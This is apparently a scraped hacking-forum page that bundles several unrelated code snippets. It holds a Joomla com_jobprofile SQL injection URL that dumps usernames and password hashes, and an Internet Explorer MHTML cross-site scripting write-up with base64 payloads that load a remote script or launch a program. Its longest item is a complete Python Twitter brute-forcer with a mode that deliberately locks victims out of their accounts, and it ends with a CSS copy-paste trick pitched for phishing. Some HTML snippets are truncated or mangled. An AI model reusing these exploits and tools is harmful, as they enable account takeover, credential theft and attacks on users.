Joomla Component Jobprofile SQL INJECTION

FROM:1337day.com

Code:

[~] Joomla Component Jobprofile (com_jobprofile) SQL Injection Vulnerability
[~] Author : kaMtiEz (kamtiez@exploit-id.com)
[~] Homepage : http://www.indonesiancoder.com / http://exploit-id.com / http://magelangcyber.web.id
[~] Date : 2 Dec , 2011
 
[ Software Information ]
 
[+] Vendor : http://www.thakkertech.com/
[+] INFO : http://extensions.joomla.org/extensions/ads-a-affiliates/jobs-a-recruitment/11924
[+] Download : http://www.thakkertech.com/products/joomla-extensions/components/jobprofile-joomla-component-detail.html
[+] Version : null / 1.0 maybe :D
[+] Price : 25,00
[+] Vulnerability : SQL INJECTION
[+] Dork : "think it :D"
[+] LOCATION :  INDONESIA -
 
[ Vulnerable File ]
 
 http://127.0.0.1/[kaMtiEz]/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=[SQL]
 
[ XpL ]
 
 http://127.0.0.1/[kaMtiEz]/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=-1+union+all+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9+from+jos_users--

 

Read More

Microsoft Internet Explorer MHTML Protocol Handler XSS

Hacking with mhtml protocol handler
 
Author: www.80vul.com [Email:5up3rh3i#gmail.com]
Release Date: 2011/1/15
References: http://www.80vul.com/mhtml/Hacking%20with%20mhtml%20protocol%20handler.txt
 
Ph4nt0m Webzine 0x05 (http://secinn.appspot.com/pstzine) Was finally released yesterday, There are two articles about the browser security[0x05 and 0x06].If the combination of both, we can complete a lot of interesting attacks...
 
1.Cross Site Scripting by upload mhtml file
 
Using the mhtml protocol handler,The file extension is ignored.so the attacker use renname the  mhtml file to a *.jpg file,etc. then upload it to the target site...
 
ofcouser ,we can use "copy /b 1.jpg + 1.mhtml 2.jpg" to bypass some upload file format security restrictions
 
then use iframe tag src to it:
 

 
2.Cross Site Scripting mhtml-file string injection
 
the mhtml-file format is only base on CRLF,so if we can injection CRLF, the site may be attacked.
 
poc:
 
test it on win7 system pls.
 

 
if win-xp or win2k3 system,pls do it by the second urlencode.
 
mhtml-file string injection in JOSN file, some sites restrict the JOSN file's Content-Type to defense xss. maybe we can use mhtml-file string injection to pass it :)
 
3.bypass X-Frame-Options
 
X-Frame-Options did not protect the mhtml protocol handler.
 
the demo:
 


 
4.mhtml+file://uncpath+Adobe Reader 9 == local xss vul
 
Billy (BK) Rios introduced a very interesting approach to Steal local files on the RuxCon/Baythreat(https://xs-sniper.com/blog/2010/12/17/will-it-blend/) ,it used  "Script src to local files in the LocalLow directory" by file:// +java apple +Adobe Reader+Adobe flash to complete it. but if used mhtml+file://uncpath, so easy to do it.
 
Demo:
 
test it on win2k3+ie8+Adobe Reader 9
 
http://www.80vul.com/hackgame/xs-g0.php?username=Administrator
 
 
5.mhtml+file://uncpath+word == local xss vul
 
demo:http://www.80vul.com/mhtml/word.doc
 
download it, and save it on c:\word.doc and open it. u can get the alert c:\boot.ini 's content.
 
this is base on "Microsoft word javascript execution"(http://marc.info/?l=bugtraq&m=121121432823704&w=2).
 
to make the proof of concept follow the following steps:
 
1-Make a html file and paste xss code
2-Open the html file with the word and save as c:\word.xml
3-Open the word.xml with the notepad,and inject the mhtml code in aaaaa 
4-Rename c:\word.xml to c:\word.doc
5-Open c:\word.doc file
 
xss code
---------------------------------------------------------

aaaaa
----------------------------------------------------------
 
mhtml code
--------------------------------------------------------
/*
Content-Type: multipart/related; boundary="_boundary_by_mere":
 
--_boundary_by_mere
Content-Location:cookie
Content-Transfer-Encoding:base64
 
PGJvZHk+DQo8c2NyaXB0IHNyYz0naHR0cDovL3d3dy44MHZ1bC5jb20vaGFja2dhbWUvZ28uanMnPjwvc2NyaXB0Pg0KPC9ib2R5Pg0K
--_boundary_by_mere--
 
*/
--------------------------------------------------------
 
if u use this vul to attack someone,u need to known the word file path where save the download file. and lots of guns used on the desktop :)
  
"Microsoft word javascript execution" is only work on office 2k3 and 2k7, In other versions u can make the link, and src to http://www.80vul.com/hackgame/word.htm
 
update
ofcouse ,this way maybe work on anoher file type like:*.pdf by app.launchURL()
 
 
6. Coss Zone Scripting
 
First we would like to mention a very old vulnerability:
 

 
This vulnerability (by firebug9[http://hi.baidu.com/firebug9/blog/item/b7627c4624cd880f6a63e5e7.html]) allows you to execute any program on "My Computer" zone,Been tested and found to this vul work on ie6/ie7/ie8+win2k/winxp/win2k3
 
Then repeat "5.mhtml+file://uncpath+word == local xss vul" steps and change:
 
xss code
---------------------------------------------------------

aaaaa
----------------------------------------------------------
 
mhtml code
--------------------------------------------------------
/*
Content-Type: multipart/related; boundary="_boundary_by_mere":
 
--_boundary_by_mere
Content-Location:cookie
Content-Transfer-Encoding:base64
 
PE9CSkVDVCBDTEFTU0lEPUNMU0lEOjEyMzQ1Njc4LTEyMzQtNDMyMS0xMjM0LTExMTExMTExMTExMSBDT0RFQkFTRT1jOi93aW5kb3dzL3N5c3RlbTMyL2NhbGMuZXhlPjwvT0JKRUNUPg==
--_boundary_by_mere--
 
*/
--------------------------------------------------------
 
 
thx d4rkwind(http://hi.baidu.com/d4rkwind/) for his excellent paper.
 
 
About Ph4nt0m Webzine
 
Ph4nt0m Webzine is a free network Security Magazine,We accept articles in English and Chinese, you are welcome contributions .
mailto:root_at_ph4nt0m.org pls.thank 

Read More

Admin login Page

Coded by ME

Admin login panel page

Code below

Code:

  

 

    
 

      

Crash_Override Admin Control Panel  Login


  



  



    
Enter your username and pass (case sensitive)

  






 



  
Username: 

  



 


  
Password: 

  


  


  
 

  


  




  COOKIES MUST BE ENABLED ON YOUR WEB BROWSER!


   


  







 

Read More

HTML maintenance page

Created by Crash_Override

Code:

 

Website is currently under construction




Note: Website will be up soon




Contact Administrators

Email:


  
  


  
    
  



We will contact you in the next 24 hours.

Read More

Minichat (php)

Minichat no MySQL need

Add the bellow code in your page:

PHP Code:

 

<button onmouseover="this.style.cursor='pointer'";  onClick="send()"><img src="images/send.gif" width="133">button><br>
<input style="background: black; color: white; text-align: center" onFocus="value=''" type="text"  name="search" id="chat"  value="">
<br>
<div id="frame1">
<iframe width="153" src="jkgh1g5h1j5gh12k5g21hk5gh5gf12tjf12cj125jyc2y5l6glug36gl36lg6gyk5f12yk1fgk515k125gyk251h125vh125kjhv51k.php">
iframe>
<script>
function send()
{
var message = document.getElementById('chat').value;
var meslen = document.getElementById('chat').value.length;
if (meslen <= 0)
{alert('Please,write the message.');
}
else if (meslen >= 81)
{alert('Maximum characters in your messages must be 80');
}
else
{document.getElementById("frame1").innerHTML='+message+'">';
}
} 

Read More

twitter brute force (py)

CODE:

#!/usr/bin/python
# Toolname   : twitteater.py
# Programmer : gunslinger_ 
# my forum   : www.devilzc0de.org/forum
# Version    : v1.0
# This was written for educational purpose only. 
# Use this at your own risk.
# Author will be not responsible for any damage !
# I'm preffer using curl on system than using pycurl

import sys, time, StringIO, commands, re, os, random 

# Define variable
__programmer__ = "gunslinger_ "
__version__    = "1.0"
twittbird    = '''
   +++                    ++++  ++++       +++
  +++++                                 ++++  ++++        +++++
  +++++                                  ++   ++++        +++++
  ++++++++++++++  ++       ++      ++         ++++        +++++           ++++         ++++++
  ++++++++++++++ ++++     ++++    ++++  ++++  +++++++++++ +++++++++++  +++++++++++    ++++++++++
  +++++          ++++     ++++    ++++  ++++  +++++++++++ +++++++++++  +++++   +++++  ++++++++++
  +++++          ++++     ++++    ++++  ++++  ++++++++++  +++++++++    +++++++++++++ +++++
  +++++          ++++    ++++++   ++++  ++++  +++++       +++++        +++++++++++++ ++++
   ++++++++++++  ++++++ +++++++  +++++  ++++   +++++++++   +++++++++   ++++          ++++
    ++++++++++++  +++++++++++++++++++   ++++    +++++++++   ++++++++   +++++++++++   ++++
     ++++++++++     +++++++  ++++++     ++++     ++++++++    +++++++     ++++++++    ++++
     "The bird has been eaten by python snake..."
     
     Programmer : %s
     Version    : %s
     Twitter bruteforcer & freezer
''' % (__programmer__, __version__)

option           = '''
Usage  : %s [options]
Option : -u, --username            |   User for bruteforcing
         -w, --wordlist            |   Wordlist used for bruteforcing
     -s, --singlepass          |   Use single password (for update status only) 
     -d, --updatestatus             |   Post new status at given username        
         -v, --verbose                |   Set %s will be verbose
         -p, --proxy             |   Set proxy will be use
         -t, --timeout             |   Set %s timeout request time (default : 15)
         -r, --refferer              |   Set %s refferer will be use (default : random)
         -f, --freeze                |   freeze user, user will be unable login for any minute
         -l, --log             |   Specify output filename (default : twitteater.log)
         -h, --help                    |   Print this help
                                                            
Example : 
     - bruteforcing mode  ~> %s -u brad@hackme.com -w wordlist.txt 
     - freeze mode          ~> %s -u brad@hackme.com -f
     - update status mode ~> %s -u brad@hackme.com -s hackmeifyoucan -d "Beware of Programmers who carry screwdrivers. -- Leonard Brandwein"
       
P.S : add "&" to run in the background  
''' % (sys.argv[0], sys.argv[0], sys.argv[0], sys.argv[0], sys.argv[0], sys.argv[0], sys.argv[0])

hme = '''
Usage : %s [option]
    -h or --help for get help''' % sys.argv[0]

refferer     = ['http://twitter.com/',
        'http://twitter.com/login',
        'http://twitter.com/about/contact',
        'http://blog.twitter.com/',
        'http://status.twitter.com/',
        'http://twitter.com/about',
        'http://twitter.com/about'
           ]

ouruseragent = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
        'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
        'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
            'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
            'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
            'Microsoft Internet Explorer/4.0b1 (Windows 95)',
            'Opera/8.00 (Windows NT 5.1; U; en)',
        'amaya/9.51 libwww/5.4.0',
        'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
        'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
        'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
        'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
        'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]'
        ]
freeze = False
upstat = False
brute = False
counter = 1
# warn , twitter will lock username after 17 x login attempt (tested)
maxlock = 18
verbocity = ''
proxy     = ''
background = ''
timeout      = '15'
statsurl  = 'http://twitter.com/statuses/update.xml'
credential = 'http://twitter.com/account/verify_credentials.xml'
green     = '\033[38m'
red     = '\033[31m'
reset     = '\033[0;0m'
log = "twitteater.log"
file = open(log, "a")

def helpme():
    print twittbird
    print option
    file.write(twittbird)
    file.write(option)
    sys.exit(1)
    
def helpmee():
    print twittbird
    print hme
    file.write(twittbird)
    file.write(hme)
    sys.exit(1)
        
for arg in sys.argv:
    if arg.lower() == '-u' or arg.lower() == '--user':
                username = sys.argv[int(sys.argv[1:].index(arg))+2]
    elif arg.lower() == '-w' or arg.lower() == '--wordlist':
                wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
                brute = True
        elif arg.lower() == '-f' or arg.lower() == '--freeze':
                freeze = True
        elif arg.lower() == '-d' or arg.lower() == '--updatestatus':
            newstatus = sys.argv[int(sys.argv[1:].index(arg))+2]
            newstatus = newstatus.replace("_"," ")
                upstat = True
        elif arg.lower() == '-t' or arg.lower() == '--timeout':
                timeout = sys.argv[int(sys.argv[1:].index(arg))+2]
        elif arg.lower() == '-s' or arg.lower() == '--singlepass':
                password = sys.argv[int(sys.argv[1:].index(arg))+2]
        elif arg.lower() == '-r' or arg.lower() == '--refferer':
                refferer = sys.argv[int(sys.argv[1:].index(arg))+2]
        elif arg.lower() == '-p' or arg.lower() == '--proxy':
                proxy = '-x '+sys.argv[int(sys.argv[1:].index(arg))+2]
        elif arg.lower() == '-v' or arg.lower() == '--verbose':
            verbocity = "-v"
        elif arg.lower() == '-l' or arg.lower() == '--log':
            log = sys.argv[int(sys.argv[1:].index(arg))+2]
    elif arg.lower() == '-h' or arg.lower() == '--help':
            helpme()
    elif len(sys.argv) <= 1:
        helpmee()

def updatestatus():
    
    trytwitter = 'curl -u %s:%s %s -d status=\"%s\" %s --connect-timeout %d -A \"%s\" %s' % (username, password, statsurl, newstatus, verbocity, int(timeout), random.choice(ouruseragent), proxy)
    restwitter = StringIO.StringIO(commands.getstatusoutput(trytwitter)[1]).read()
    updated = re.findall("", restwitter)
    duplicate = re.findall("Status is a duplicate.", restwitter)
    if verbocity == "-v":
        print restwitter
    if duplicate:
        os.system("notify-send -i `pwd`/twitter.jpg -u normal -t 5000 \"Twitteater\" \"Duplicate status found\"")
        print "[*] Duplicate status is not accepted by twitter, please don't reduplicate it\n"
        file.write("\n[*] Duplicate status is not accepted by twitter, please don't reduplicate it!\n\n")
        sys.exit(1)
    if updated:
        os.system("notify-send -i `pwd`/twitter.jpg -u normal -t 5000 \"Twitteater\" \"update status successfully\"")
        print "[*] Update status : %s%s%s has been posted successfully ! \n" % (red, newstatus, reset)
        file.write("\n[*] Update status : %s has been posted successfully !\n\n" % (newstatus))
        sys.exit(1)
    else:
        os.system("notify-send -i `pwd`/twitter.jpg -u normal -t 5000 \"Twitteater\" \"update status failed\"")
        print "[*] password is wrong ! \n" 
        file.write("\n[*] password is wrong !\n\n")
        sys.exit(1)

def freezemode():
    global counter
    if freeze:
        print "[*] Trying to freeze account %s%s%s, user will be unable login for hour(s)" % (red, username, reset)
        file.write("\n[*] Trying to freeze account %s, user will be unable login for hour(s)" % (username))
        try:
            while counter <= maxlock:
                sys.stdout.write("\r[*] %s%d%s try has gived...                          " % (red, int(counter), reset))
                sys.stdout.flush()
                trytwitter = 'curl -u %s:freeze %s %s --connect-timeout %d' % (username, credential, verbocity, int(timeout))
                restwitter = StringIO.StringIO(commands.getstatusoutput(trytwitter)[1]).read()
                locked = re.findall("This account is locked due to too many failed login attempts -- try again in ([\d.]*\d+) seconds", restwitter)
                if locked:
                    os.system("notify-send -i `pwd`/twitter.jpg -u normal -t 5000 \"Twitteater\" \"Account successfully freeze\"")
                    print "\n[*] Acount freeze %s%s%s succeded, and unable for login for %d seconds !" % (red, username, reset, int(locked[0]))
                    file.write("\n[*] Acount freeze %s succeded, and unable for login for %d seconds !\n\n" % (username, int(locked[0])))
                    sys.exit(1)
                if verbocity == "-v":
                    print restwitter
                counter = int(counter) + 1
        except KeyboardInterrupt:
            print "\n[-] Deactivated freezing mode\n"
            file.write("\n[-] Deactivated freezing mode\n")
            sys.exit(1)
        
def twitteater(word):
    global counter
    sys.stdout.write("\r[*] Trying %s is %s%d%s of %s%d%s                                  " % (word, red, int(counter), reset, red, len(words), reset))
    sys.stdout.flush()
    file.write("\n[*] Trying %s is %d of %d                                                \n" % (word, int(counter), len(words)))
         try:
        trytwitter = 'curl -u %s:%s %s -A "%s" %s -e %s --connect-timeout %d %s' % (username, word, credential, random.choice(ouruseragent), verbocity, random.choice(refferer), int(timeout), proxy)
        restwitter = StringIO.StringIO(commands.getstatusoutput(trytwitter)[1]).read()
        partwitter = re.findall("", restwitter)
        sick = re.findall("This account is locked due to too many failed login attempts -- try again in ([\d.]*\d+) seconds", restwitter)
        if sick:
            print "\n[*] Account %s%s%s has been freeze by twitter" % (red, username, reset)
            file.write("\n[*] Account %s has been freeze by twitter" % (username))
            os.system("notify-send -i `pwd`/twitter.jpg -u normal -t 5000 \"Twitteater\" \"Account has been freeze\"")
            sleeper = 0
            while sleeper <= int(sick[0]):
                sys.stdout.write("\r[*] Waiting %d second(s) for start bruteforcing again...           " % (int(sick[0])))
                sys.stdout.flush()
                sleeper = int(sleeper) + 1
                sick[0] = int(sick[0]) - 1
                time.sleep(1)
        if partwitter:
            print "\n[*] Account has been login successfully !"
            print "[*] Username : %s%s%s" % (red, username, reset)
            print "[*] Password : %s%s%s" % (red, word, reset)
            file.write("\n[*] Account has been login successfully !\n")
            file.write("[*] Username : %s\n" % (username))
            file.write("[*] Password : %s\n\n" % (word))
            os.system("notify-send -i `pwd`/twitter.jpg -u normal -t 5000 \"Twitteater\" \"login successfull !\"")
            sys.exit(1)
        if verbocity == "-v":
            print restwitter
    except KeyboardInterrupt:
        print "\n[-] Deactivated bruteforcing mode...\n"
        file.write("\n[-] Deactivated bruteforcing mode...\n")
        sys.exit(1)
    counter = int(counter) + 1
          
def bruteforcemode():
    global word        
    for word in words:
        twitteater(word.replace("\n",""))    

def main():
    global words
    print twittbird
    file.write(twittbird)
    print "[*] Starting attack at %s" % time.strftime("%X")
    file.write("\n[*] Starting attack at %s" % time.strftime("%X"))
    if freeze:
        print "[*] %sFreeze%s mode %sactivated%s" % (red, reset, red, reset)
        file.write("\n[*] Freeze mode activated")
    elif brute:
        print "[*] %sBruteforce%s mode %sactivated%s" % (red, reset, red, reset)
        file.write("\n[*] bruteforce mode activated")
    elif upstat:
        print "[*] %sUpdate status%s mode %sactivated%s" % (red, reset, red, reset)
        file.write("\n[*] Update status mode activated")
    print "[*] Using PID : %s%s%s \n" % (red, os.getpid(), reset)
    file.write("\n[*] Using PID : %s \n" % (os.getpid()))
    if freeze:
        freezemode()
    if upstat:
        updatestatus()
    if brute:     
        try:
            preventstrokes = open(wordlist, "r")
            words            = preventstrokes.readlines()
            count          = 0 
            while count < len(words): 
                words[count] = words[count].strip() 
                count += 1 
        except(IOError): 
              print "\n[-] Error: Check your wordlist path\n"
            file.write("\n[-] Error: Check your wordlist path\n")
              sys.exit(1)
        bruteforcemode()
        twitteater(word)

    
if __name__ == '__main__':
    main()

Read More

Trick them with css (Copy past preventing)

Hello dudes i will show you how you can fool someone if he try to copy past your email address or any text in your lovely page

Step 1
Add this (css) code in to your page (internal or external its upon you)

PHP Code:

<style type="text/css">

.fooling{
  float:right;
  font-size:.001px;
  color:transparent;
  display:inline-block;
  width:0px;
  }
style> 

Step 2:

In the body i will give you an example what you could add (editable)

PHP Code:

my<span cl***="fooling">spam-span>email@yahoo<span cl***="fooling">removedspan>.com 

How it looks like in your page?
It will looks like that..

myemail@yahoo.com

Now after he copy past your email he will got this:

myspam-email@yahooremoved.com

As you can see copy past is not possible anymore its copying wrong text & because i know how evil you are... you can simple trick him with your fake (Phishing page link)

Read More